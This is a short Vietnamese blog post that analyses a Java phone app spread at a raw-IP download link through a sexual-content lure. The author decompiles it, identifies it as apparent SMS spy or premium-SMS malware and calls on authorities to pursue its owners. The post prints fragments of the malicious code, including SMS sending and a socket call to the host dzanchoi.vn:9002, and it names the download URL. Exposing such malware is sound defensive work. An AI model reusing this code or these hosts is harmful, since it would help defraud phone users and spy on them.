07 June 2012

[Phân tích] http://210.211.100.170/g/l9.jar TQN


Bài viết liên quan:

1 post của anh TQN trên facebook


Từ khóa

"Sexy NgocTrinh>>Chi danh cho 18+. Tai MienPhi: http://210.211.100.170/g/l9.jar"

Phân tích

Trưa này, wget nó về thử xem sao. Dùng 7z unjar nó, DJ Java Decompiler để decompiler. Hì hì, hình như một dạng SMS spy. Vì code đt tui không rành lắm, post lên cho bà con chỉ giáo:
private final String MIDLET_CLASS_NAME = "GameMidlet";
private static final String SMS_CONNECTION_URL = "sms://:5678";
private static final String ALLOWED_SENDER_FILTER = "*";
....
public void run()
{
if(sendSms(h3.SMS_NUMBER, h3.SMS_CODE))
try
{
rc = RecordStore.openRecordStore(h3.RC_CODE, true);
sRecord(rc, 1);
rc.closeRecordStore();
}
......
socket://dzanchoi.vn:9002
........
Em đề nghị cơ quan có chức năn tìm ngay chủ nhân của cái IP 210.211.100.170 và dzanchoi.vn, mời nó đi ăn cơm miễn phí, mặc áo Juventus cho vui.
Bổ sung


Làm được gì ?

:))

0 comments:

Post a Comment

Để lại góp ý của bạn để blog của mình hoàn thiện hơn :))